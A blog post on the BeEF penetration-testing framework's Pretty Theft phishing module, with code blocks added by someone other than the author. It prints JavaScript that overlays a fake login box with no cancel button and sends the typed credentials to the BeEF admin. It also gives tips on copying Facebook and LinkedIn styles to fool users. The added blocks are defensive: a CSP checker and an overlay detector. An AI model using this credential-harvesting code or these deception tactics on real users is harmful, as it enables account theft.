Tuesday, 2 October 2012

Update to the Pretty Theft (phishing) module in BeEF

Hi all,

Today I'm going to be talking a bit more about BeEF and specifically the Pretty Theft module.

For those of you who don't know, BeEF (the Browser Exploitation Framework) is a tool that cleverly uses the browser's built-in functionality, JavaScript and other third-party software against the user. What's interesting is that it doesn't rely on any exploit (although that is also possible) to get the job done, so even if you are fully patched you can still be attacked using BeEF.

Initial compromise of the user's browser usually relies on XSS, luring the user to your own website containing malicious JavaScript, or MITM injection of JavaScript. Once the user's browser runs the BeEF hook JavaScript it silently connects back to the BeEF admin and you can deploy any of the 125 BeEF modules.
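A defensive counterpart to the delivery paths just listed, added here as an example that is not from the post or from BeEF: a small evaluator that reads a Content-Security-Policy header and reports whether an injected inline script, or a script pulled from a host the site does not control, would still be allowed to run. The sample policies are constructed. It models the common source keywords only; `'strict-dynamic'` and report-only mode are left out, and it says nothing about an attacker on the network path who simply strips the header from a plain-HTTP response, which is a transport-security question rather than a CSP one.

```javascript
// Evaluates a Content-Security-Policy header against the hook-delivery paths
// named above: an injected inline <script> (reflected XSS) and a <script>
// loaded from a host the site does not control (lured page or injected tag).
// Added example, not part of the post or of BeEF; the sample policies are
// constructed. 'strict-dynamic' and report-only mode are not modelled.

function parseCsp(header) {
  // "a b c; d e" -> { a: ['b', 'c'], d: ['e'] }; directive names lower-cased.
  const directives = {};
  for (const part of String(header || '').split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

function isNonceOrHash(source) {
  return /^'(nonce-|sha(256|384|512)-)/i.test(source);
}

// Source expressions that let a script load from hosts the site does not
// control: wildcards, bare schemes, wildcard subdomains and data: URLs.
function isOpenSource(source) {
  return source === '*' || source === 'http:' || source === 'https:' || source === 'data:'
    || source.startsWith('*.') || source.includes('//*.');
}

function assessScriptPolicy(header) {
  const directives = parseCsp(header);
  // script-src falls back to default-src; with neither, scripts are unrestricted.
  const sources = directives['script-src'] || directives['default-src'];
  if (!sources) {
    return { inlineAllowed: true, foreignHostsAllowed: true, hosts: [], blocksHookDelivery: false };
  }
  const lower = sources.map(s => s.toLowerCase());
  // Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
  const inlineAllowed = lower.includes("'unsafe-inline'") && !lower.some(isNonceOrHash);
  const foreignHostsAllowed = lower.some(isOpenSource);
  // Explicit allowlisted origins: each one is worth reviewing on its own.
  const hosts = lower.filter(s => !s.startsWith("'") && !isOpenSource(s));
  return {
    inlineAllowed,
    foreignHostsAllowed,
    hosts,
    blocksHookDelivery: !inlineAllowed && !foreignHostsAllowed,
  };
}

// Constructed sample policies.
const POLICY_PERMISSIVE = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com";
const POLICY_NONCED = "default-src 'self'; script-src 'self' 'nonce-r4nd0m' 'unsafe-inline'";
const POLICY_WILDCARD = "script-src *";

for (const p of [POLICY_PERMISSIVE, POLICY_NONCED, POLICY_WILDCARD, '']) {
  console.log(JSON.stringify(p || '(no header)'), JSON.stringify(assessScriptPolicy(p)));
}
```

The `hosts` list is deliberately returned rather than judged: a third-party CDN in `script-src` is a legitimate design choice, but every origin on it is one whose compromise would let a script run with the page's authority, so it belongs in the review.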

BeEF is included with BackTrack but you probably want to do a git clone to get the latest version (see previous post!). For more info the BeEF site is here: http://beefproject.com/

So what is the Pretty Theft module?

The Pretty Theft module is a phishing module that uses floating divs to create legitimate-looking fake login boxes displayed inside the browser page. It was originally created by Nickosaurus Hax (http://atta.cked.me/home). I really liked the idea of the module but it was quite basic: there was only one default pop up and it looked really fake. To make the module more effective I decided to try to add some additional pop up boxes with different styles.

The original pretty theft dialog box:

To start with I wanted to create a Facebook pop up, a LinkedIn pop up and also to update some of the module logic.

How does Pretty Theft work?

The module starts by creating a semi-transparent grey background that covers the whole page. This prevents the user from interacting with the page and forces them to confront the pop up box.

(Code slightly edited for blog)

//Define properties
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');

//Build layer and position
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the dark layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
dark=document.getElementById('darkenScreenObject'); // Get the object.

//Assign style properties
dark.style.width= pageWidth;
dark.style.height= pageHeight;

Next a separate div is created to simulate a pop up window; its style and positioning are defined and it is appended to the page.

// Generic floating div with image
function generic() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:30%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');

sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';

// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);


Once the OK button is pressed a hidden field is set to true. The checker function is called every second and verifies that the button has been pressed and that the input boxes contain some data. If everything checks out the data is sent to the BeEF admin and the divs are removed from the page, leaving the user to carry on browsing happily. If the user didn't enter any data they are prompted with an alert and sent back to the dialog box.

function checker(){
  uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
  pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
  valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;

  if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
    // Join user/pass and send to attacker
    answer = uname1+":"+pass1;
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
    // Set lastchild invisible
    // Lighten screen

  }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
    // If user has not entered any data reset button
    document.body.lastChild.getElementsByTagName("input")[3].value = "false";
    alert("Please enter a valid username and password.");
  }
}
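The structure just walked through, a full-page layer pinned to the top-left corner with a floating box stacked above it that holds a password field, is also what a defender can look for. Below is an added example, not BeEF code and not part of the original post, of a heuristic that scans a snapshot of page elements for exactly that combination. The element records, the viewport size and the `login-form` allowlist entry are constructed; the two ids `darkenScreenObject` and `popup` are the ones used in the module code above.

```javascript
// Defender-side heuristic for the overlay-phishing shape described above:
// a full-page semi-transparent layer pinned to the top-left corner, with a
// floating box stacked above it that contains a password field. This is an
// added example and not BeEF code; the element records, allowlist id and
// viewport size below are constructed to mirror the structure in the post.

const MIN_LAYER_COVERAGE = 0.9; // fraction of the viewport a layer must cover

function px(value) {
  // "1280px", "1280" or 1280 -> 1280; anything unparseable -> NaN.
  const n = parseFloat(String(value));
  return Number.isFinite(n) ? n : NaN;
}

function isFloating(style) {
  return style.position === 'absolute' || style.position === 'fixed';
}

// A blocking layer: floating, anchored at (0,0), visible (opacity > 0) and
// large enough to cover the viewport, so the page beneath cannot be used.
function isBlockingLayer(el, viewport) {
  const s = el.style;
  if (!isFloating(s) || px(s.top) !== 0 || px(s.left) !== 0) return false;
  const opacity = s.opacity === undefined ? 1 : parseFloat(s.opacity);
  return opacity > 0
    && px(s.width) >= viewport.width * MIN_LAYER_COVERAGE
    && px(s.height) >= viewport.height * MIN_LAYER_COVERAGE;
}

// A credential prompt: a floating element containing a password input whose
// id is not on the page's own allowlist of legitimate login containers.
function isCredentialPrompt(el, knownLoginIds) {
  return isFloating(el.style)
    && (el.inputTypes || []).includes('password')
    && !knownLoginIds.includes(el.id);
}

// Flag only prompts stacked above a blocking layer: that combination is the
// "no way out but to type credentials" pattern, not an ordinary modal.
function scanElements(elements, viewport, knownLoginIds = []) {
  const layers = elements.filter(el => isBlockingLayer(el, viewport));
  const prompts = elements.filter(el => isCredentialPrompt(el, knownLoginIds));
  const findings = [];
  for (const prompt of prompts) {
    const promptZ = px(prompt.style['z-index']) || 0;
    for (const layer of layers) {
      if (promptZ > (px(layer.style['z-index']) || 0)) {
        findings.push({ layer: layer.id, prompt: prompt.id });
      }
    }
  }
  return { suspicious: findings.length > 0, findings };
}

// Turns the live DOM into the record shape scanElements expects. Only
// meaningful in a browser; the Node.js path below never calls it.
function snapshotDom(doc, win) {
  return Array.from(doc.querySelectorAll('*')).map(el => {
    const cs = win.getComputedStyle(el);
    return {
      id: el.id,
      style: {
        position: cs.position, top: cs.top, left: cs.left,
        width: cs.width, height: cs.height, opacity: cs.opacity,
        'z-index': cs.zIndex,
      },
      inputTypes: Array.from(el.querySelectorAll('input')).map(i => i.type),
    };
  });
}

// Constructed snapshot of a 1280x800 viewport after the two divs described
// in the post (ids taken from the post's code) have been added to the page.
const SAMPLE_VIEWPORT = { width: 1280, height: 800 };
const SAMPLE_INJECTED = [
  { id: 'nav', style: { position: 'static' }, inputTypes: [] },
  { id: 'darkenScreenObject',
    style: { position: 'absolute', top: '0px', left: '0px', width: '1280px',
             height: '3000px', opacity: '0.7', 'z-index': '50' },
    inputTypes: [] },
  { id: 'popup',
    style: { position: 'absolute', top: '30%', left: '40%', width: '400px', 'z-index': '51' },
    inputTypes: ['text', 'password', 'button', 'hidden'] },
];
// Constructed benign page: an in-flow login form, no covering layer.
const SAMPLE_BENIGN = [
  { id: 'nav', style: { position: 'static' }, inputTypes: [] },
  { id: 'login-form', style: { position: 'static' }, inputTypes: ['text', 'password', 'submit'] },
];

if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  // In a browser: re-scan whenever nodes are added anywhere in the document.
  new MutationObserver(() => {
    const viewport = { width: window.innerWidth, height: window.innerHeight };
    const result = scanElements(snapshotDom(document, window), viewport, ['login-form']);
    if (result.suspicious) console.warn('Possible injected credential overlay', result.findings);
  }).observe(document.documentElement, { childList: true, subtree: true });
} else {
  console.log(JSON.stringify(scanElements(SAMPLE_INJECTED, SAMPLE_VIEWPORT)));
}
```

The allowlist matters: sites with their own login modals will produce the floating-password-field half of the pattern legitimately, so the heuristic only fires when that box sits above a layer that also blocks the rest of the page, and known containers can be excluded by id. A detector of this kind is a monitoring aid for a site's own pages (or a browser extension), not a substitute for keeping the hook script out in the first place.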

What sneaky tricks do you use to fool the user?

I'd say the most important aspect of effective phishing, or social engineering of any kind, is being convincing. By making your malicious activity as realistic as possible the user will assume it's perfectly normal and happily go along with it.

To achieve this I focused on getting as close as I could to the real styles used by Facebook and LinkedIn. I used a combination of info from the web, forums, blogs etc. and inspection of the actual website code using the built-in Google Chrome Developer Tools. In Chrome you just right-click any page element and select "Inspect element" and bam, you get the code. Super useful for borrowing code and styles.

The second aspect I focused on was the module logic and how the user interacts with the dialog box. Most legitimate dialog boxes give you two choices, continue or cancel. To ensure the user interacted with the div I only had a continue button. I didn't add a cancel button or any other way to close the box, for example a cross in the top right-hand corner. This forces the user to confront the box and enter credentials. Another design choice was the validation of user input. I added a check to ensure that the user has entered a username and password; if either is missing an alert box prompts them to enter valid data. Every little bit helps when trying to scam that end user :)

Final Product: Real vs Fake

A real Facebook message box:

My fake Facebook dialog box:


If I get some time I'd like to improve the appearance of the pop ups, add more pop ups and clean up the code a bit. IE6 is not supported at the moment; it flat out refused to layer the divs. Border opacity was something I didn't end up finishing, as the child elements were inheriting the opacity, creating semi-visible pop up boxes. I just needed to create a separate div for it but there were some positioning issues. Definitely something that can be fixed, I was just too lazy :)

The BeEF framework brilliantly demonstrates how lethal even the smallest bit of JavaScript can be and how important it is to use NoScript. Through modules like Pretty Theft it's really easy to demonstrate the kinds of attacks organisations are facing today and how best to defend against them. If you've not played with BeEF before I suggest you go grab a copy. If you are using BackTrack, to make it work you first need to grab the latest edition and then install bundler within the BeEF directory. Commands are below:

rm -rf /pentest/web/beef && git clone https://github.com/beefproject/beef.git /pentest/web/beef

gem install --user-install bundler

As usual if you have any suggestions or questions feel free to comment below.
